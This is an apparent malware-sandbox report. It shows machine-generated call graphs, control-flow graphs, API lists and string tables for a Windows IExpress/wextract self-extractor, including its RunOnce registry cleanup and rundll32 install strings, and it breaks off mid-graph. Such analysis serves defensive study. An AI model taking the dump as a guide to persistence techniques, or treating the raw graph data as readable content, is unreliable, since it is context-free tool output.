                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                          callgraph 0 Function_00007FF7D2A611CC 84 Function_00007FF7D2A68470 0->84 1 Function_00007FF7D2A64DCC 3 Function_00007FF7D2A6114C 1->3 29 Function_00007FF7D2A67E34 1->29 49 Function_00007FF7D2A61008 1->49 59 Function_00007FF7D2A67F04 1->59 1->84 2 Function_00007FF7D2A6204C 2->2 27 Function_00007FF7D2A67BA8 2->27 60 Function_00007FF7D2A61084 2->60 2->84 4 Function_00007FF7D2A6494C 4->1 10 Function_00007FF7D2A65050 4->10 5 Function_00007FF7D2A67AC8 5->1 6 Function_00007FF7D2A68648 50 Function_00007FF7D2A68494 6->50 7 Function_00007FF7D2A62C54 7->1 28 Function_00007FF7D2A62DB4 7->28 40 Function_00007FF7D2A62318 7->40 48 Function_00007FF7D2A61C0C 7->48 68 Function_00007FF7D2A661EC 7->68 69 Function_00007FF7D2A630EC 7->69 8 Function_00007FF7D2A680D0 43 Function_00007FF7D2A68818 8->43 85 Function_00007FF7D2A68870 8->85 9 Function_00007FF7D2A67850 11 Function_00007FF7D2A688D0 36 Function_00007FF7D2A68930 11->36 67 Function_00007FF7D2A68880 11->67 12 Function_00007FF7D2A68750 13 Function_00007FF7D2A651BC 13->5 14 Function_00007FF7D2A6473C 14->1 14->40 62 Function_00007FF7D2A67700 14->62 14->84 15 Function_00007FF7D2A687BC 16 Function_00007FF7D2A663B8 16->3 16->27 16->49 16->84 17 Function_00007FF7D2A640C4 17->1 17->3 17->10 17->14 26 Function_00007FF7D2A61D28 17->26 17->27 58 Function_00007FF7D2A61684 17->58 17->62 82 Function_00007FF7D2A679F0 17->82 17->84 18 Function_00007FF7D2A666C4 18->1 18->5 18->10 18->27 45 Function_00007FF7D2A66CA4 18->45 18->62 76 Function_00007FF7D2A62468 18->76 18->84 86 Function_00007FF7D2A664E4 18->86 19 Function_00007FF7D2A62244 19->27 19->84 20 Function_00007FF7D2A67C40 21 Function_00007FF7D2A63840 72 Function_00007FF7D2A64C68 21->72 22 Function_00007FF7D2A63B40 23 Function_00007FF7D2A6772C 23->3 23->84 24 Function_00007FF7D2A6512C 24->49 24->60 25 Function_00007FF7D2A670A8 25->1 25->6 25->27 46 Function_00007FF7D2A67024 25->46 73 Function_00007FF7D2A67CE8 25->73 75 Function_00007FF7D2A67D68 25->75 25->84 26->1 26->3 26->27 26->84 27->60 28->1 28->2 28->5 28->10 28->25 70 Function_00007FF7D2A612EC 28->70 77 Function_00007FF7D2A63BF4 28->77 28->84 30 Function_00007FF7D2A62834 38 Function_00007FF7D2A6261C 30->38 31 Function_00007FF7D2A658B0 31->13 31->24 41 Function_00007FF7D2A65B18 31->41 56 Function_00007FF7D2A6527C 31->56 61 Function_00007FF7D2A65380 31->61 80 Function_00007FF7D2A65770 31->80 31->84 32 Function_00007FF7D2A678B0 32->27 32->84 33 Function_00007FF7D2A64A30 34 Function_00007FF7D2A63530 34->1 34->27 34->45 34->72 79 Function_00007FF7D2A66B70 34->79 91 Function_00007FF7D2A64A60 34->91 35 Function_00007FF7D2A681B0 37 Function_00007FF7D2A68B30 38->27 38->49 38->84 39 Function_00007FF7D2A68A9C 40->19 42 Function_00007FF7D2A68417 43->15 44 Function_00007FF7D2A660A4 44->1 44->10 44->62 45->1 57 Function_00007FF7D2A624F8 45->57 45->62 45->84 47 Function_00007FF7D2A633A0 48->1 48->84 51 Function_00007FF7D2A65690 51->22 52 Function_00007FF7D2A65D90 52->1 52->10 92 Function_00007FF7D2A65C60 52->92 53 Function_00007FF7D2A63910 53->1 53->22 53->72 54 Function_00007FF7D2A68910 55 Function_00007FF7D2A68790 56->1 56->49 57->1 57->3 57->84 58->1 58->3 58->27 58->49 58->60 71 Function_00007FF7D2A62A6C 58->71 74 Function_00007FF7D2A615E8 58->74 58->75 58->84 59->84 61->1 63 Function_00007FF7D2A61500 63->72 63->84 64 Function_00007FF7D2A67E00 65 Function_00007FF7D2A68802 66 Function_00007FF7D2A68200 66->7 66->11 88 Function_00007FF7D2A68964 66->88 68->2 68->20 68->84 69->1 69->4 69->5 69->17 69->18 69->23 69->27 69->40 69->44 69->45 69->52 69->62 78 Function_00007FF7D2A63F74 69->78 69->84 87 Function_00007FF7D2A65FE4 69->87 70->0 70->84 71->20 71->49 71->84 72->84 74->73 76->1 76->84 77->1 77->29 77->30 77->59 77->84 78->1 78->5 78->10 78->62 79->1 79->27 79->49 79->62 81 Function_00007FF7D2A633F0 81->72 82->27 82->84 83 Function_00007FF7D2A65870 84->50 86->16 86->27 86->45 86->62 86->79 86->84 87->1 87->10 87->23 89 Function_00007FF7D2A655E0 90 Function_00007FF7D2A657E0 91->1 91->49 92->61 92->80 92->84 93 Function_00007FF7D2A68A62 93->39 94 Function_00007FF7D2A68B60

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 7ff7d2a640c4-7ff7d2a64116 1 7ff7d2a64118-7ff7d2a64133 call 7ff7d2a65050 0->1 2 7ff7d2a64139-7ff7d2a64141 0->2 1->2 9 7ff7d2a64254-7ff7d2a6427d call 7ff7d2a64dcc 1->9 4 7ff7d2a64145-7ff7d2a64167 memset 2->4 6 7ff7d2a6416d-7ff7d2a64188 call 7ff7d2a65050 4->6 7 7ff7d2a64282-7ff7d2a64295 4->7 6->9 18 7ff7d2a6418e-7ff7d2a64194 6->18 8 7ff7d2a64299-7ff7d2a642a3 7->8 12 7ff7d2a642b7-7ff7d2a642c2 8->12 13 7ff7d2a642a5-7ff7d2a642ab 8->13 21 7ff7d2a644ee 9->21 17 7ff7d2a642c5-7ff7d2a642c8 12->17 13->12 16 7ff7d2a642ad-7ff7d2a642b5 13->16 16->8 16->12 22 7ff7d2a64328-7ff7d2a6433d call 7ff7d2a61684 17->22 23 7ff7d2a642ca-7ff7d2a642e2 call 7ff7d2a65050 17->23 19 7ff7d2a6419d-7ff7d2a641a0 18->19 20 7ff7d2a64196-7ff7d2a6419b 18->20 25 7ff7d2a641ad-7ff7d2a641af 19->25 26 7ff7d2a641a2-7ff7d2a641ab 19->26 24 7ff7d2a641b5 20->24 28 7ff7d2a644f0-7ff7d2a6451f call 7ff7d2a68470 21->28 22->21 36 7ff7d2a64343-7ff7d2a6434a 22->36 23->9 35 7ff7d2a642e8-7ff7d2a642ef 23->35 30 7ff7d2a641b8-7ff7d2a641bb 24->30 25->30 31 7ff7d2a641b1 25->31 26->24 30->17 37 7ff7d2a641c1-7ff7d2a641cb 30->37 31->24 39 7ff7d2a645d8-7ff7d2a645df 35->39 40 7ff7d2a642f5-7ff7d2a64322 CompareStringA 35->40 41 7ff7d2a6434c-7ff7d2a64353 36->41 42 7ff7d2a6436a-7ff7d2a6436c 36->42 43 7ff7d2a641cd-7ff7d2a641d0 37->43 44 7ff7d2a64231-7ff7d2a64234 37->44 49 7ff7d2a6472d-7ff7d2a6472f 39->49 50 7ff7d2a645e5-7ff7d2a645ec 39->50 40->22 40->39 41->42 46 7ff7d2a64355-7ff7d2a6435c 41->46 51 7ff7d2a64493-7ff7d2a6449b 42->51 52 7ff7d2a64372-7ff7d2a64379 42->52 47 7ff7d2a641db-7ff7d2a641dd 43->47 48 7ff7d2a641d2-7ff7d2a641d9 43->48 44->22 45 7ff7d2a6423a-7ff7d2a64252 call 7ff7d2a65050 44->45 45->9 45->17 46->42 56 7ff7d2a6435e-7ff7d2a64360 46->56 47->21 58 7ff7d2a641e3 47->58 57 7ff7d2a641ea-7ff7d2a641fb call 7ff7d2a65050 48->57 49->28 50->49 59 7ff7d2a645f2-7ff7d2a64621 RegOpenKeyExA 50->59 54 7ff7d2a6449d-7ff7d2a644a4 call 7ff7d2a6473c 51->54 55 7ff7d2a644df-7ff7d2a644e9 LocalFree 51->55 60 7ff7d2a64599-7ff7d2a645d3 call 7ff7d2a64dcc LocalFree 52->60 61 7ff7d2a6437f-7ff7d2a64381 52->61 69 7ff7d2a644a9-7ff7d2a644ab 54->69 55->21 56->52 65 7ff7d2a64362-7ff7d2a64365 call 7ff7d2a61d28 56->65 57->9 80 7ff7d2a641fd-7ff7d2a6422d CompareStringA 57->80 58->57 59->49 66 7ff7d2a64627-7ff7d2a64666 RegQueryValueExA 59->66 60->21 61->51 68 7ff7d2a64387-7ff7d2a6438e 61->68 65->42 72 7ff7d2a6471c-7ff7d2a64728 RegCloseKey 66->72 73 7ff7d2a6466c-7ff7d2a6469b memset GetSystemDirectoryA 66->73 68->51 75 7ff7d2a64394-7ff7d2a6439f call 7ff7d2a679f0 68->75 69->55 77 7ff7d2a644ad-7ff7d2a644c3 LocalFree 69->77 72->49 78 7ff7d2a6469d-7ff7d2a646ae call 7ff7d2a67ba8 73->78 79 7ff7d2a646b3-7ff7d2a646dc call 7ff7d2a6114c 73->79 85 7ff7d2a64574-7ff7d2a64597 call 7ff7d2a64dcc 75->85 86 7ff7d2a643a5-7ff7d2a643c1 GetProcAddress 75->86 77->39 83 7ff7d2a644c9-7ff7d2a644ce 77->83 78->79 90 7ff7d2a646e3-7ff7d2a646ea 79->90 80->44 83->4 99 7ff7d2a64553-7ff7d2a6456f LocalFree call 7ff7d2a67700 85->99 88 7ff7d2a643c7-7ff7d2a64415 86->88 89 7ff7d2a64521-7ff7d2a6454e call 7ff7d2a64dcc FreeLibrary 86->89 92 7ff7d2a64417-7ff7d2a6441b 88->92 93 7ff7d2a6441f-7ff7d2a64427 88->93 89->99 90->90 94 7ff7d2a646ec-7ff7d2a64717 RegSetValueExA 90->94 92->93 97 7ff7d2a64429-7ff7d2a6442d 93->97 98 7ff7d2a64431-7ff7d2a64433 93->98 94->72 97->98 102 7ff7d2a6443d-7ff7d2a64445 98->102 103 7ff7d2a64435-7ff7d2a64439 98->103 99->21 105 7ff7d2a64447-7ff7d2a6444b 102->105 106 7ff7d2a6444f-7ff7d2a64451 102->106 103->102 105->106 107 7ff7d2a6445b-7ff7d2a6447e 106->107 108 7ff7d2a64453-7ff7d2a64457 106->108 110 7ff7d2a644d3-7ff7d2a644da FreeLibrary 107->110 111 7ff7d2a64480-7ff7d2a64491 FreeLibrary 107->111 108->107 110->55 111->77
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                          • String ID: <None>$ADMQCMD$Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                          • API String ID: 2679723528-4292097765
                                                                                                                                                                                          • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                                                                                          • Instruction ID: ac9d3b99bf5721e764d84ca0b917f513e0891005d341afb4dcad01f60e2feb05
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1026171A08E4386E768AB10A844ABDB7A0FBC4746FD40137DE4D43A94DFBDD54AC728

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                          • API String ID: 178549006-210537523
                                                                                                                                                                                          • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                                                                                          • Instruction ID: a78e4818e840d4e757f5f55d8d46c08af702034ff7eba92bfec61148ca308fed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3814D32A08E8286E714AB61A844ABDFBA1FBC9B56FC55132DE4E03754DFBCD106C714

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 144 7ff7d2a61684-7ff7d2a616ce 145 7ff7d2a616d3-7ff7d2a616dd 144->145 146 7ff7d2a616df-7ff7d2a616e5 145->146 147 7ff7d2a616f2-7ff7d2a61704 145->147 146->147 148 7ff7d2a616e7-7ff7d2a616f0 146->148 149 7ff7d2a61713-7ff7d2a6171a 147->149 150 7ff7d2a61706-7ff7d2a61711 147->150 148->145 148->147 151 7ff7d2a6171e-7ff7d2a6173c call 7ff7d2a615e8 149->151 150->151 154 7ff7d2a6173e 151->154 155 7ff7d2a617aa-7ff7d2a617c2 151->155 157 7ff7d2a61741-7ff7d2a61748 154->157 156 7ff7d2a617c7-7ff7d2a617d1 155->156 158 7ff7d2a617d3-7ff7d2a617d9 156->158 159 7ff7d2a617e6-7ff7d2a617ff call 7ff7d2a67ba8 156->159 157->157 160 7ff7d2a6174a-7ff7d2a6174e 157->160 158->159 161 7ff7d2a617db-7ff7d2a617e4 158->161 164 7ff7d2a61804-7ff7d2a61814 call 7ff7d2a67d68 159->164 160->155 163 7ff7d2a61750-7ff7d2a61757 160->163 161->156 161->159 165 7ff7d2a6175e-7ff7d2a61760 163->165 166 7ff7d2a61759-7ff7d2a6175c 163->166 172 7ff7d2a61a1b-7ff7d2a61a2b call 7ff7d2a67d68 164->172 173 7ff7d2a6181a-7ff7d2a61847 CompareStringA 164->173 165->155 168 7ff7d2a61762-7ff7d2a61764 165->168 166->165 167 7ff7d2a61766-7ff7d2a61776 166->167 170 7ff7d2a6177b-7ff7d2a61785 167->170 168->155 168->167 174 7ff7d2a61787-7ff7d2a6178d 170->174 175 7ff7d2a6179a-7ff7d2a617a8 170->175 184 7ff7d2a61acb-7ff7d2a61ae9 LocalAlloc 172->184 185 7ff7d2a61a31-7ff7d2a61a5e CompareStringA 172->185 173->172 176 7ff7d2a6184d-7ff7d2a61861 GetFileAttributesA 173->176 174->175 177 7ff7d2a6178f-7ff7d2a61798 174->177 175->164 179 7ff7d2a61867-7ff7d2a6186f 176->179 180 7ff7d2a619f3-7ff7d2a619fb 176->180 177->170 177->175 179->180 182 7ff7d2a61875-7ff7d2a61891 call 7ff7d2a615e8 179->182 183 7ff7d2a61a00-7ff7d2a61a16 call 7ff7d2a64dcc 180->183 197 7ff7d2a61893-7ff7d2a618b0 call 7ff7d2a615e8 182->197 198 7ff7d2a618b5-7ff7d2a618d1 LocalAlloc 182->198 199 7ff7d2a61bda-7ff7d2a61c03 call 7ff7d2a68470 183->199 188 7ff7d2a61aeb-7ff7d2a61aff GetFileAttributesA 184->188 189 7ff7d2a61aa2-7ff7d2a61aad 184->189 185->184 190 7ff7d2a61a60-7ff7d2a61a67 185->190 193 7ff7d2a61b7e-7ff7d2a61b88 188->193 194 7ff7d2a61b01-7ff7d2a61b03 188->194 189->183 195 7ff7d2a61a6a-7ff7d2a61a71 190->195 196 7ff7d2a61b8f-7ff7d2a61b99 193->196 194->193 200 7ff7d2a61b05-7ff7d2a61b16 194->200 195->195 201 7ff7d2a61a73 195->201 203 7ff7d2a61b9b-7ff7d2a61ba1 196->203 204 7ff7d2a61bae-7ff7d2a61bb9 196->204 197->198 198->189 206 7ff7d2a618d7-7ff7d2a6194d GetPrivateProfileIntA GetPrivateProfileStringA 198->206 207 7ff7d2a61b1d-7ff7d2a61b27 200->207 202 7ff7d2a61a78-7ff7d2a61a7f 201->202 202->202 209 7ff7d2a61a81-7ff7d2a61aa0 LocalAlloc 202->209 203->204 210 7ff7d2a61ba3-7ff7d2a61bac 203->210 211 7ff7d2a61bbc-7ff7d2a61bcc call 7ff7d2a62a6c 204->211 212 7ff7d2a61984-7ff7d2a61993 206->212 213 7ff7d2a6194f-7ff7d2a6197f call 7ff7d2a61008 * 2 206->213 214 7ff7d2a61b3c-7ff7d2a61b4d 207->214 215 7ff7d2a61b29-7ff7d2a61b2f 207->215 209->189 219 7ff7d2a61ab2-7ff7d2a61ac6 call 7ff7d2a6114c 209->219 210->196 210->204 226 7ff7d2a61bd1-7ff7d2a61bd5 211->226 217 7ff7d2a619ba 212->217 218 7ff7d2a61995-7ff7d2a619b8 GetShortPathNameA 212->218 213->226 214->211 223 7ff7d2a61b4f-7ff7d2a61b52 214->223 215->214 222 7ff7d2a61b31-7ff7d2a61b3a 215->222 224 7ff7d2a619c1-7ff7d2a619ee call 7ff7d2a6114c 217->224 218->224 219->226 222->207 222->214 223->211 228 7ff7d2a61b54-7ff7d2a61b7c call 7ff7d2a61084 * 2 223->228 224->226 226->199 228->211
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                          • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                          • API String ID: 383838535-3708461209
                                                                                                                                                                                          • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                                                                                          • Instruction ID: a7615bb133d0ef734bd30b8de48cf556f784effbd13ad3b37d7830865dbab984
                                                                                                                                                                                          • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE1AF62A08A8285EB19AF24D440AFDBBA0EBC5746FD44137CE4D03795DFBDD50AC724

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 238 7ff7d2a666c4-7ff7d2a66724 call 7ff7d2a65050 LocalAlloc 241 7ff7d2a66756-7ff7d2a6676a call 7ff7d2a65050 238->241 242 7ff7d2a66726-7ff7d2a66749 call 7ff7d2a64dcc call 7ff7d2a67700 238->242 247 7ff7d2a6676c-7ff7d2a667a3 call 7ff7d2a64dcc LocalFree 241->247 248 7ff7d2a667a5-7ff7d2a667ea lstrcmpA LocalFree 241->248 259 7ff7d2a6674f-7ff7d2a66751 242->259 247->259 251 7ff7d2a667ec-7ff7d2a667ee 248->251 252 7ff7d2a66837-7ff7d2a6683d 248->252 257 7ff7d2a667fb 251->257 258 7ff7d2a667f0-7ff7d2a667f9 251->258 254 7ff7d2a66b14-7ff7d2a66b38 call 7ff7d2a67ac8 252->254 255 7ff7d2a66843-7ff7d2a66849 252->255 261 7ff7d2a66b3a-7ff7d2a66b66 call 7ff7d2a68470 254->261 255->254 262 7ff7d2a6684f-7ff7d2a66870 GetTempPathA 255->262 263 7ff7d2a667fe-7ff7d2a6680e call 7ff7d2a664e4 257->263 258->257 258->263 259->261 266 7ff7d2a668ad-7ff7d2a668b9 262->266 267 7ff7d2a66872-7ff7d2a6687e call 7ff7d2a664e4 262->267 274 7ff7d2a66814-7ff7d2a66832 call 7ff7d2a64dcc 263->274 275 7ff7d2a66b0f-7ff7d2a66b12 263->275 272 7ff7d2a668bc-7ff7d2a668bf 266->272 273 7ff7d2a66883-7ff7d2a66885 267->273 276 7ff7d2a668c4-7ff7d2a668ce 272->276 273->275 277 7ff7d2a6688b-7ff7d2a66895 call 7ff7d2a62468 273->277 274->259 275->261 279 7ff7d2a668d0-7ff7d2a668d5 276->279 280 7ff7d2a668e1-7ff7d2a668f3 276->280 277->266 292 7ff7d2a66897-7ff7d2a668a7 call 7ff7d2a664e4 277->292 279->280 281 7ff7d2a668d7-7ff7d2a668df 279->281 282 7ff7d2a66adb-7ff7d2a66b04 GetWindowsDirectoryA call 7ff7d2a66ca4 280->282 283 7ff7d2a668f9-7ff7d2a6690f GetDriveTypeA 280->283 281->276 281->280 282->259 297 7ff7d2a66b0a 282->297 286 7ff7d2a66916-7ff7d2a6692a GetFileAttributesA 283->286 287 7ff7d2a66911-7ff7d2a66914 283->287 290 7ff7d2a66930-7ff7d2a66933 286->290 291 7ff7d2a669bd-7ff7d2a669d0 call 7ff7d2a66ca4 286->291 287->286 287->290 294 7ff7d2a669ad 290->294 295 7ff7d2a66935-7ff7d2a6693f 290->295 303 7ff7d2a669f4-7ff7d2a66a00 call 7ff7d2a62468 291->303 304 7ff7d2a669d2-7ff7d2a669de call 7ff7d2a62468 291->304 292->266 292->275 299 7ff7d2a669b1-7ff7d2a669b8 294->299 295->299 300 7ff7d2a66941-7ff7d2a66953 295->300 297->272 306 7ff7d2a66ad2-7ff7d2a66ad5 299->306 300->299 305 7ff7d2a66955-7ff7d2a66981 GetDiskFreeSpaceA 300->305 314 7ff7d2a66a16-7ff7d2a66a3e call 7ff7d2a67ba8 GetFileAttributesA 303->314 315 7ff7d2a66a02-7ff7d2a66a11 GetWindowsDirectoryA 303->315 304->294 313 7ff7d2a669e0-7ff7d2a669f2 call 7ff7d2a66ca4 304->313 305->294 309 7ff7d2a66983-7ff7d2a669a4 MulDiv 305->309 306->282 306->283 309->294 312 7ff7d2a669a6-7ff7d2a669ab 309->312 312->291 312->294 313->294 313->303 320 7ff7d2a66a55 314->320 321 7ff7d2a66a40-7ff7d2a66a53 CreateDirectoryA 314->321 315->314 322 7ff7d2a66a58-7ff7d2a66a5a 320->322 321->322 323 7ff7d2a66a5c-7ff7d2a66a6b 322->323 324 7ff7d2a66a6d-7ff7d2a66a8e SetFileAttributesA 322->324 323->306 325 7ff7d2a66a91-7ff7d2a66a9b 324->325 326 7ff7d2a66a9d-7ff7d2a66aa3 325->326 327 7ff7d2a66aaf-7ff7d2a66acc call 7ff7d2a664e4 325->327 326->327 328 7ff7d2a66aa5-7ff7d2a66aad 326->328 327->275 331 7ff7d2a66ace 327->331 328->325 328->327 331->306
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                          • API String ID: 3973824516-3101140712
                                                                                                                                                                                          • Opcode ID: 27d35e7384e6713e219a42e7dfd4cde3bd40dee3fa6d05908367947fe1441dc0
                                                                                                                                                                                          • Instruction ID: 666c1139b40a1cef9e3040389a2d6a8068981e02146705cff875958dcef9d2d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27d35e7384e6713e219a42e7dfd4cde3bd40dee3fa6d05908367947fe1441dc0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD19622A1CA8286EB18AF209450A7EF7A1FBC5B46FD44036DE4D43695DF7DD406CB24

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 332 7ff7d2a62db4-7ff7d2a62e4d call 7ff7d2a68b09 memset * 2 call 7ff7d2a65050 337 7ff7d2a62e53-7ff7d2a62e94 CreateEventA SetEvent call 7ff7d2a65050 332->337 338 7ff7d2a630a5 332->338 343 7ff7d2a62ec3-7ff7d2a62ecb 337->343 344 7ff7d2a62e96-7ff7d2a62ea0 337->344 340 7ff7d2a630aa-7ff7d2a630b9 call 7ff7d2a64dcc 338->340 345 7ff7d2a630be 340->345 348 7ff7d2a62ecd-7ff7d2a62ecf 343->348 349 7ff7d2a62ed5-7ff7d2a62ef0 call 7ff7d2a65050 343->349 346 7ff7d2a62ea2-7ff7d2a62ebe call 7ff7d2a64dcc 344->346 347 7ff7d2a630c0-7ff7d2a630e3 call 7ff7d2a68470 345->347 346->345 348->349 352 7ff7d2a62fa3-7ff7d2a62fb3 call 7ff7d2a670a8 348->352 359 7ff7d2a62efe-7ff7d2a62f1c CreateMutexA 349->359 360 7ff7d2a62ef2-7ff7d2a62efc 349->360 362 7ff7d2a62fc4-7ff7d2a62fcb 352->362 363 7ff7d2a62fb5-7ff7d2a62fbf 352->363 359->352 361 7ff7d2a62f22-7ff7d2a62f33 GetLastError 359->361 360->346 361->352 364 7ff7d2a62f35-7ff7d2a62f48 361->364 365 7ff7d2a62fde-7ff7d2a62ffd FindResourceExA 362->365 366 7ff7d2a62fcd-7ff7d2a62fd9 call 7ff7d2a6204c 362->366 363->340 368 7ff7d2a62f4a-7ff7d2a62f60 call 7ff7d2a64dcc 364->368 369 7ff7d2a62f62-7ff7d2a62f7f call 7ff7d2a64dcc 364->369 370 7ff7d2a63014-7ff7d2a6301b 365->370 371 7ff7d2a62fff-7ff7d2a63011 LoadResource 365->371 366->345 381 7ff7d2a62f81-7ff7d2a62f9e CloseHandle 368->381 369->352 369->381 374 7ff7d2a6301d-7ff7d2a63024 #17 370->374 375 7ff7d2a63029-7ff7d2a63030 370->375 371->370 374->375 378 7ff7d2a6303a-7ff7d2a63044 call 7ff7d2a63bf4 375->378 379 7ff7d2a63032-7ff7d2a63035 375->379 378->345 384 7ff7d2a63046-7ff7d2a63055 378->384 379->347 381->345 384->379 385 7ff7d2a63057-7ff7d2a63061 384->385 385->379 386 7ff7d2a63063-7ff7d2a6306a 385->386 386->379 387 7ff7d2a6306c-7ff7d2a63073 call 